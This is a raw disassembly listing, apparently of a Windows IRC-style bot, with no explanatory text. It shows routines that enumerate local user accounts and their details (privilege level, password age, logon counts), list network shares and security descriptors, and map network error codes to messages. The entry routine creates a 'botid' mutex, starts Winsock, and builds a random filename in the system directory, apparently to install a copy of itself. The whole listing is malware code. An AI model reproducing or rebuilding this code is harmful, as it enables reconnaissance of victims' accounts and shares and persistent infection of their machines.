push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_43AAD4
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40C01E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C085 proc near ; CODE XREF: sub_40BF5E+6E�p
; sub_41471A+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_40C0F0
push [ebp+arg_4]
mov edi, eax
call sub_40C0F0
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_417070
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40C0F0
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call ds:dword_436368
pop edi
leave
retn
sub_40C085 endp
; =============== S U B R O U T I N E =======================================
sub_40C0F0 proc near ; CODE XREF: sub_40C085+A�p
; sub_40C085+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_40C0FD
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C0FD: ; CODE XREF: sub_40C0F0+9�j
push ebx
push esi
mov esi, ds:dword_422134
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_4167A5
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40C0F0 endp
; =============== S U B R O U T I N E =======================================
sub_40C131 proc near ; CODE XREF: sub_40BF5E+20�p
; sub_4143F6+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40C0F0
push [esp+8+arg_4]
mov esi, eax
call sub_40C0F0
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_436340
pop esi
retn
sub_40C131 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C154 proc near ; CODE XREF: sub_40D2E0+2169�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_40C0F0
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 18h
loc_40C18D: ; CODE XREF: sub_40C154+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call ds:dword_4363B4
mov ebx, eax
cmp ebx, esi
jz short loc_40C1F0
cmp ebx, 0EAh
jz short loc_40C1F0
push ebx
push ebx
call sub_40C925
pop ecx
push eax
lea eax, [ebp+var_210]
push offset dword_42A60C
push eax
call sub_415480
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 24h
jmp short loc_40C25D
; ---------------------------------------------------------------------------
loc_40C1F0: ; CODE XREF: sub_40C154+5D�j
; sub_40C154+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_40C254
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_40C1FE: ; CODE XREF: sub_40C154+FC�j
push dword ptr [esi+10h]
call ds:dword_43635C ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40C215
mov eax, offset aNo ; "No"
loc_40C215: ; CODE XREF: sub_40C154+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_415480
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_40C1FE
xor esi, esi
loc_40C254: ; CODE XREF: sub_40C154+A2�j
push [ebp+var_4]
call ds:dword_4364F8
loc_40C25D: ; CODE XREF: sub_40C154+9A�j
cmp ebx, 0EAh
jz loc_40C18D
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40C154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C275 proc near ; CODE XREF: sub_40D2E0:loc_40F4B5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40C31A
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40C2B7
dec eax
jz short loc_40C2AC
dec eax
jnz short loc_40C2D2
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_40C3BC
add esp, 14h
jmp short loc_40C2CE
; ---------------------------------------------------------------------------
loc_40C2AC: ; CODE XREF: sub_40C275+1D�j
push ebx
push edi
call sub_40C39B
pop ecx
pop ecx
jmp short loc_40C2CE
; ---------------------------------------------------------------------------
loc_40C2B7: ; CODE XREF: sub_40C275+1A�j
cmp [ebp+arg_8], edi
jz short loc_40C2CB
push [ebp+arg_8]
push ebx
push edi
call sub_40C341
add esp, 0Ch
jmp short loc_40C2CE
; ---------------------------------------------------------------------------
loc_40C2CB: ; CODE XREF: sub_40C275+45�j
push 57h
pop eax
loc_40C2CE: ; CODE XREF: sub_40C275+35�j
; sub_40C275+40�j ...
cmp eax, edi
jnz short loc_40C2F2
loc_40C2D2: ; CODE XREF: sub_40C275+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_43AD38
push ds:off_429EBC[eax*4]
push offset dword_42A6F0
push esi
call sub_415480
add esp, 10h
jmp short loc_40C33A
; ---------------------------------------------------------------------------
loc_40C2F2: ; CODE XREF: sub_40C275+5B�j
push eax
call sub_40C925
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_43AD38
push ds:off_429EB8[eax*4]
push offset dword_42A6B4
push esi
call sub_415480
add esp, 14h
jmp short loc_40C33A
; ---------------------------------------------------------------------------
loc_40C31A: ; CODE XREF: sub_40C275+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_43AD38
lea eax, [eax+eax*2]
push ds:off_429EB8[eax*4]
push offset dword_42A67C
push esi
call sub_415480
add esp, 0Ch
loc_40C33A: ; CODE XREF: sub_40C275+7B�j
; sub_40C275+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40C275 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C341 proc near ; CODE XREF: sub_40C275+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_40C0F0
push [ebp+arg_4]
mov edi, eax
call sub_40C0F0
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_40C0F0
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_43634C
pop edi
leave
retn
sub_40C341 endp
; =============== S U B R O U T I N E =======================================
sub_40C39B proc near ; CODE XREF: sub_40C275+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40C0F0
push [esp+8+arg_4]
mov esi, eax
call sub_40C0F0
pop ecx
pop ecx
push eax
push esi
call ds:dword_43633C
pop esi
retn
sub_40C39B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C3BC proc near ; CODE XREF: sub_40C275+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_40C0F0
push [ebp+arg_4]
mov esi, eax
call sub_40C0F0
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_4364C0
test eax, eax
mov [ebp+arg_0], eax
jnz loc_40C764
mov eax, [ebp+var_4]
test eax, eax
jz loc_40C79F
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_415480
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40C4DB
dec eax
jz short loc_40C4D4
dec eax
jz short loc_40C4CD
mov eax, offset aUnknown_0 ; "Unknown"
jmp short loc_40C4E0
; ---------------------------------------------------------------------------
loc_40C4CD: ; CODE XREF: sub_40C3BC+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_40C4E0
; ---------------------------------------------------------------------------
loc_40C4D4: ; CODE XREF: sub_40C3BC+105�j
mov eax, offset aUser_1 ; "User"
jmp short loc_40C4E0
; ---------------------------------------------------------------------------
loc_40C4DB: ; CODE XREF: sub_40C3BC+102�j
mov eax, offset aGuest ; "Guest"
loc_40C4E0: ; CODE XREF: sub_40C3BC+10F�j
; sub_40C3BC+116�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_415480
push 1
push esi
lea eax, [ebp+var_204]
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_415480
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40BAE7
add esp, 20h
pop edi
pop ebx
jmp short loc_40C790
; ---------------------------------------------------------------------------
loc_40C764: ; CODE XREF: sub_40C3BC+35�j
push eax
lea eax, [ebp+var_204]
push offset dword_42A720
push eax
call sub_415480
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40BAE7
add esp, 20h
loc_40C790: ; CODE XREF: sub_40C3BC+3A6�j
cmp [ebp+var_4], 0
jz short loc_40C79F
push [ebp+var_4]
call ds:dword_4364F8
loc_40C79F: ; CODE XREF: sub_40C3BC+40�j
; sub_40C3BC+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_40C3BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C7A5 proc near ; CODE XREF: sub_40D2E0+21F2�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_40C0F0
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 18h
loc_40C7E4: ; CODE XREF: sub_40C7A5+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call ds:dword_4363D0
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40C845
cmp eax, 0EAh
jz short loc_40C845
push eax
push eax
call sub_40C925
pop ecx
push eax
lea eax, [ebp+var_218]
push offset dword_42A930
push eax
call sub_415480
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 24h
jmp short loc_40C8C0
; ---------------------------------------------------------------------------
loc_40C845: ; CODE XREF: sub_40C7A5+62�j
; sub_40C7A5+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_40C8D3
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_40C8C0
loc_40C857: ; CODE XREF: sub_40C7A5+ED�j
cmp edi, esi
jz short loc_40C896
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_5 ; " %S"
push eax
call sub_415480
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40C857
jmp short loc_40C8C0
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40C7A5+B4�j
lea eax, [ebp+var_218]
push offset dword_42A8EC
push eax
call sub_415480
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 1Ch
loc_40C8C0: ; CODE XREF: sub_40C7A5+9E�j
; sub_40C7A5+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40C8D3
push edi
call ds:dword_4364F8
xor edi, edi
mov [ebp+var_4], edi
loc_40C8D3: ; CODE XREF: sub_40C7A5+A5�j
; sub_40C7A5+120�j
cmp [ebp+var_C], 0EAh
jz loc_40C7E4
cmp edi, esi
jz short loc_40C8EB
push edi
call ds:dword_4364F8
loc_40C8EB: ; CODE XREF: sub_40C7A5+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_415480
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40C7A5 endp
; =============== S U B R O U T I N E =======================================
sub_40C925 proc near ; CODE XREF: sub_40BF5E+41�p
; sub_40C154+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40C9D7
jz loc_40C9D0
cmp eax, 7Bh
ja short loc_40C99C
jz short loc_40C992
cmp eax, 5
jz short loc_40C988
cmp eax, 8
jz short loc_40C97E
cmp eax, 32h
jz short loc_40C974
cmp eax, 35h
jz short loc_40C96A
cmp eax, 57h
jnz loc_40CA26
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C96A: ; CODE XREF: sub_40C925+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C974: ; CODE XREF: sub_40C925+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C97E: ; CODE XREF: sub_40C925+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C988: ; CODE XREF: sub_40C925+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C992: ; CODE XREF: sub_40C925+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C99C: ; CODE XREF: sub_40C925+1A�j
sub eax, 7Ch
jz short loc_40C9C9
sub eax, 7C8h
jz short loc_40C9C2
dec eax
jz short loc_40C9B8
dec eax
jnz short loc_40CA26
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C9B8: ; CODE XREF: sub_40C925+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40CA47
; ---------------------------------------------------------------------------
loc_40C9C2: ; CODE XREF: sub_40C925+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40C9C9: ; CODE XREF: sub_40C925+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40C9D0: ; CODE XREF: sub_40C925+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40C9D7: ; CODE XREF: sub_40C925+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40CA10
jz short loc_40CA09
sub eax, 8ADh
jz short loc_40CA3B
dec eax
dec eax
jz short loc_40CA02
dec eax
jz short loc_40C9FB
dec eax
dec eax
jnz short loc_40CA26
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40C9FB: ; CODE XREF: sub_40C925+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA02: ; CODE XREF: sub_40C925+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA09: ; CODE XREF: sub_40C925+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA10: ; CODE XREF: sub_40C925+B9�j
sub eax, 8CAh
jz short loc_40CA42
sub eax, 17h
jz short loc_40CA3B
sub eax, 25h
jz short loc_40CA34
sub eax, 29h
jz short loc_40CA2D
loc_40CA26: ; CODE XREF: sub_40C925+35�j
; sub_40C925+87�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA2D: ; CODE XREF: sub_40C925+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA34: ; CODE XREF: sub_40C925+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA3B: ; CODE XREF: sub_40C925+C2�j
; sub_40C925+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40CA47
; ---------------------------------------------------------------------------
loc_40CA42: ; CODE XREF: sub_40C925+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_40CA47: ; CODE XREF: sub_40C925+40�j
; sub_40C925+4A�j ...
push offset dword_43AAD8
call sub_415480
pop ecx
mov eax, offset dword_43AAD8
pop ecx
retn
sub_40C925 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA59 proc near ; CODE XREF: sub_40D2E0+2231�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_417AD9
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_422138 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_417AD9
lea eax, [ebp+var_718]
push eax
call sub_417ABC
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call ds:dword_436478
test eax, eax
jnz short loc_40CAE9
mov esi, offset dword_43A8D4
push offset dword_42AC80
push esi
call sub_415480
pop ecx
pop ecx
jmp short loc_40CB12
; ---------------------------------------------------------------------------
loc_40CAE9: ; CODE XREF: sub_40CA59+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_40C925
pop ecx
mov esi, offset dword_43A8D4
push eax
push offset dword_42AC48
push esi
call sub_415480
add esp, 14h
loc_40CB12: ; CODE XREF: sub_40CA59+8E�j
mov eax, esi
pop esi
leave
retn
sub_40CA59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB17 proc near ; CODE XREF: _0:00417DCD�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_6F4 = byte ptr -6F4h
var_5F4 = byte ptr -5F4h
var_4F0 = byte ptr -4F0h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_1E8 = byte ptr -1E8h
var_E4 = byte ptr -0E4h
var_64 = dword ptr -64h
var_58 = dword ptr -58h
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_40B9B9
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_422048
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_4C8CC0, eax
call esi ; GetTickCount
push eax
call sub_4154D2
pop ecx
call sub_407E65
push 2
call ds:dword_436514 ; SetErrorMode
push 7530h
push offset aBotid ; "botid"
push ebx
push ebx
call ds:dword_42214C ; CreateMutexA
push eax
call ds:dword_422148 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40CB94
push 1
call ds:off_42212C
loc_40CB94: ; CODE XREF: sub_40CB17+73�j
lea eax, [ebp+var_884]
push eax
push 202h
call ds:dword_4363E0 ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40CFF7
cmp [ebp+var_884], 2
jnz loc_40CFF1
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_40CFF1
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call ds:dword_422058 ; GetSystemDirectoryA
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call ds:off_4220E0
push eax
call ds:off_422060
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push ebx
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_4173D8
add esp, 14h
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push offset aSS_2 ; "%s%s"
lea eax, [ebp+var_5F4]
push esi
push eax
call sub_4159FA
lea eax, [ebp+var_3F0]
push eax
lea eax, [ebp+var_2EC]
push eax
call sub_415A50
add esp, 1Ch
test eax, eax
jnz loc_40CDFA
cmp ds:dword_42ACD4, ebx
mov esi, offset byte_42AD8C
jz short loc_40CC92
push esi
xor edi, edi
call sub_415C80
sub eax, 4
pop ecx
jz short loc_40CC92
loc_40CC6F: ; CODE XREF: sub_40CB17+179�j
call sub_4154DC
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov ds:byte_42AD8C[edi], dl
inc edi
call sub_415C80
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40CC6F
loc_40CC92: ; CODE XREF: sub_40CB17+148�j
; sub_40CB17+156�j
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_415480
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call ds:off_422080
cmp eax, 0FFFFFFFFh
jz short loc_40CCD2
lea eax, [ebp+var_1E8]
push 80h
push eax
call ds:dword_422108 ; SetFileAttributesA
loc_40CCD2: ; CODE XREF: sub_40CB17+1A7�j
mov esi, ds:dword_422144
lea eax, [ebp+var_1E8]
